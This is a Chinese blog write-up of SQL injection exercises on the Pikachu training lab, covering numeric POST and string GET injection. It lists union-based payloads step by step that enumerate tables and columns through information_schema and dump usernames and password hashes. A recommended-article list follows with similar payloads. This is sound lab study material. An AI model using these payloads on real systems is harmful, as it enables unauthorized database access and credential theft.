【pikachu~SQL注入】1 数字型注入POST 字符型注入GET

最新推荐文章于 2024-07-04 13:40:13 发布
最新推荐文章于 2024-07-04 13:40:13 发布
阅读量294 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/117927466
版权

!!!

yeah!

在这里插入图片描述
注意:不要访问localhost
使用局域网ip访问
环回地址和localhost在burp是默认不抓包的

数字型注入POST

1. GET更容易受到攻击

前端下拉菜单选择 限制输入

2. 抓包修改id值

1 and 1 = 1 返回正常
1 and 1 = 2  查询失败

3. 爆字段

1 order by 2
1 order by 3

……

在这里插入图片描述
在这里插入图片描述

4. 爆库 爆用户

1 union select user(),database()

在这里插入图片描述

5. 爆表

1 union select database(), group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

6. 爆列

1 union select database(), group_concat(column_name)  from information_schema.columns where table_schema=database() and table_name='users'

‘user’ 会一直报错,或许有大佬可以告我问什么吗
在这里插入图片描述
去掉 and table_name=‘users’

7. 爆值

1 union select database(),group_concat(username,,password) from pikachu.users

在这里插入图片描述
admine10adc3949ba59abbe56e057f20f883e,pikachu670b14728ad9902aecba32e22fa4f6bd,teste99a18c428cb38d5f260853678922e03

在这里插入图片描述

字符型注入GET

url编码问题卡了我很久

SELECT * FROM users WHERE username='$username';

一样的流程
闭合引号

fancy' and 1=1 --+

kobe' order by 2 --+

kobe' union select user(),database()--+

在这里插入图片描述

kobe' union select database(
),group_concat(table_name) from information_schema.tables where table_schema='pikachu' --+

在这里插入图片描述

kobe' union select database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

kobe' union select database(),group_concat(username,'~',password) from pikachu.users--+

在这里插入图片描述

(∪.∪ )...zzz
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
SQL注入---数值注入POST
Ethan024的博客
03-22 503
SQL注入—数值注入POST)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值注入POST) 实验步骤: 先查询一下下拉框的功能: 查看此时的URL:http://localhost/pikaqiu.cn/vul/sqli/sqli_id.php发现是post方式提交的请求,因为没有使用URL传参。 后端数据库查询逻辑:select name, email from table where id = n(1,2,3,4…) 使用Burpsuite
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
pikachu】-SQL注入数字型
vector的博客
03-02 521
1.首先判断是否有注入风险,有序输入方式是下拉列表,所以无法进行直接的输入改造,用bp抓包下来,在repeater中改包。 将id=1改成 id=1 and 1=2,服务器允许了这句sql执行,并且返回“输入id不存在”,说明存在sql注入的风险 2.现在构造语句,在repeater中改为 id=1 or 1=1,此时的搜索条件恒成立,因此可以返回表单中的所有内容 实验成功 ...
pikachu闯关(一)---数字型注入
最新发布
weixin_75034911的博客
07-04 815
pikachu中是通过单选下拉进行选择提交,可以通过html中下拉选择的节点,进行注入
Pikachu SQL注入数字型注入
SS_liang的博客
01-11 1539
我们在点击选择框里面的123456时,url没有变化,不是get请求,我们直接抓包试试:1. GET请求:GET请求用于从服务器获取资源,通过将参数附加在URL的末尾来传递数据。这些参数以键值对的形式出现在URL的查询字符串中,例如:http://example.com?GET请求的特点包括:- 数据以明文形式出现在URL中,可以被缓存、书签等记录。- 传输的数据量有限,受URL长度限制。- 数据通过URL传输,对于敏感信息不太安全。- GET请求可被浏览器主动缓存。
Pikachu的sql数字型注入
m0_63152656的博客
09-24 454
pikachu的sql数字型注入 及 终端打开小皮数据库
pikachu-SQL】数字型注入post)2022,超详细
weixin_46497491的博客
09-10 1589
pikachu-SQL】数字型注入post)2022,超详细,web渗透,sql注入,渗透测试
sql注入数字型注入
08-02
SQL 注入数字型注入 SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
3. 数字型注入1
08-03
数字型注入:判断列数:获取数据库名称爆破数据库 pikachu,获取数据表名称id=2 union select group_concat(distinct t
web-报错注入-皮卡丘靶场
07-15
`admin' and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e)),1)`这个Payload则更进一步,尝试获取数据库`pikachu`中的第一...
pikachu.rar
03-05
Pikachu:本地测试环境与SQL注入攻防详解》 "Pikachu.rar" 是一个专为Web安全攻防设计的压缩包文件,其主要内容是搭建一个详尽的漏洞平台,便于用户进行SQL注入测试以及靶场环境的构建。在这个环境中,我们可以...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
SQL注入】是一种常见的网络安全漏洞,发生在Web应用程序中,攻击者通过输入恶意的SQL语句来控制或篡改数据库。本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **...
pikachu靶场包含网络安全中常见的漏洞
11-08
Pikachu靶场中,你可以学习如何检测XSS漏洞,理解反射、存储和DOMXSS的区别,并掌握防御策略,如输入过滤、输出编码等。 2. **SQL注入**:SQL注入是攻击者通过输入恶意的SQL语句来获取、修改、删除数据库...
sql和xss等靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
9.delete 注入1
08-03
本文将深入探讨一个名为 "9.delete 注入1" 的网络安全问题,它涉及到的是数字型SQL注入攻击。SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入参数中插入恶意SQL代码来操控数据库。在这个特定的例子中,...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2629
Pikachu-----Sql Inject(SQL注入
pikachu漏洞平台sql注入数字型注入
安全界的彭于晏的博客
06-24 720
1 .首先分析一下 我们这里通过提交 数字获取到查询的邮箱.我们得到的信息是它是一个数字类的变量 我们想象一下它的代码和查询语句大概是下面这样 id=id=id=_POST[‘id’] 通过提交的数字赋值给变量ID select 字段1, 字段2 from 表名 where id = 1; 这是大概的查询语句 这里我们并不知道 两个字段名字 和表名只是知道提交的数字1 2. 判断是否存在注入点 通过burp 抓包 这里我提交的2 放到重放器里进行重放攻击测试 我这里 -1 测试下
pikachu靶场练习——数字型注入
tyelixy的博客
08-09 1439
burpsuite未安装完成,不涉及抓包相关内容 前置内容 由于网页的生成有时需要用到用户输入的信息,再根据用户输入到数据库中查找相关内容,所以网页中会含有sql语句。针对sql语句,可以进行sql注入。 如: $sql="SELECT * FROM news WHERE id={$id}"; 这样的语句可以进行数字型注入。 题目实战 打开靶场,选择sql数字型注入题,出现以下页面。 下拉栏中有选项 ---以及数字1~6。 选择数字一先发送个请求试试: 可以看到发送的表单中id:1 然后发现可以在检.
pikachu sql注入数字型
09-13
根据你提供的引用内容和,使用数字型注入进行SQL注入是一种常见的攻击方式。在使用数字型注入时,攻击者通常会尝试通过构造SQL语句中的数字参数来绕过应用程序的安全验证。 针对pikachu数据库的SQL注入,可以使用以下方法来实现数字型注入: 1. 首先,我们需要了解当前数据库中的表信息。可以通过使用UNION联合查询结合information_schema数据库来获取表名。具体的SQL语句如下: ``` SELECT 99, table_name FROM information_schema.tables WHERE table_schema = 'pikachu' ``` 这条语句将返回99和表名的结果。 2. 接下来,我们可以使用类似的方法获取表中的列名。通过UNION联合查询结合information_schema数据库中的columns表来获取列名。具体的SQL语句如下: ``` SELECT 99, column_name FROM information_schema.columns WHERE table_name = 'users' ``` 这条语句将返回99和列名的结果。 通过这些方法,我们可以逐步获取数据库的结构信息,进而进行更复杂的注入攻击。需要注意的是,SQL注入是一种非常危险的攻击方式,应该密切关注应用程序的安全性并采取相应的防护措施。同时,未经授权的SQL注入行为是非法的,严禁进行。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值